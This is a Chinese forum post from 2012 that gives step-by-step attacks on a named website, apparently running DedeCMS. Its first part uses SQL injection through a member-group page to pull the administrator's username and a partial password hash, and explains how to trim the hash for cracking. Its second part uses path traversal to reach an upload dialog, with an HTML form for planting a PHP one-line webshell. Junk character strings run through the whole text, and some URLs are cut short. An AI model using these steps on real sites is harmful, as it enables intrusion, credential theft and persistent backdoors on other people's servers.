①注入漏洞。6 `/ Z; s+ B, p- {
这站 http://www.political-security.com/3 d4 [4 v! X I+ W2 @
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,3 X+ H' f1 v' J! N; W6 _
www.political-security.com/data/mysql_error_trace.inc 爆后台* Y% O1 D+ o: Z* V+ Z6 ~8 n! ?
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
9 b. r9 w& I3 R* W然后写上语句
# K0 Z" G2 x `; |# u! V查看管理员帐号
$ o9 K q6 K5 N/ Y: V. N6 Hhttp://www.political-security.co ... &membergroup=@`
, x% v1 s9 J: f* o0 G5 k' @: K2 P% T$ G5 o3 e: M l1 E
admin 6 m0 o; m' b+ L# i2 a
7 j+ t9 \. F4 b6 `# \ {
查看管理员密码
3 A/ Z% s2 Q, x3 I. r* ?) W; b http://www.political-security.co ... &membergroup=@`5 z4 ^' `% H/ ]1 D
5 y' c2 E1 J. m4 |+ Q9 E' o6 D! B8d29b1ef9f8c5a5af429+ i! l; x" y- D# g* c
3 X; C. P' |6 e- Z2 i1 L5 o
查看管理员密码" i. y9 ?# {0 S8 I
4 z2 s7 `/ ~* ]6 N
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
# C `" e/ R& @, a$ I" w, I" s' n; Y, r: T
8d2
! \. X5 c6 \; t, I$ }$ b. |9b1ef9f8c5a5af428 u2 X' K+ p! ?1 \5 ^7 E
9
$ f/ @ n7 }) c; a. a% L
! d( q" _+ M# [( f" Wcmd5没解出来 只好测试第二个方法9 t' C8 O6 l( H8 x% J
/ f) h# |4 h! |0 `5 i( M8 i
" |0 X* x6 s; i3 ]/ j" t9 Q②上传漏洞:
1 Q$ {5 `1 `$ [
' ^, k" a# p2 x- p8 L只要登陆会员中心,然后访问页面链接
: z/ C: Z# q3 H1 r“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
! f8 P: t- r) r$ g
! v0 j6 m# ^4 ~如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”9 M. Y( U- \& v, l0 w
+ A4 L" s7 u/ R& o1 @. F+ [于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 Q! B8 t% v. L) ]" u# i4 {
1 @4 S }. w- U/ H& v. b3 _0 N
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>% f, X) ~7 L- ?" z. _
或者
8 ?8 ]9 [" y6 b4 e3 T; U2 L即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对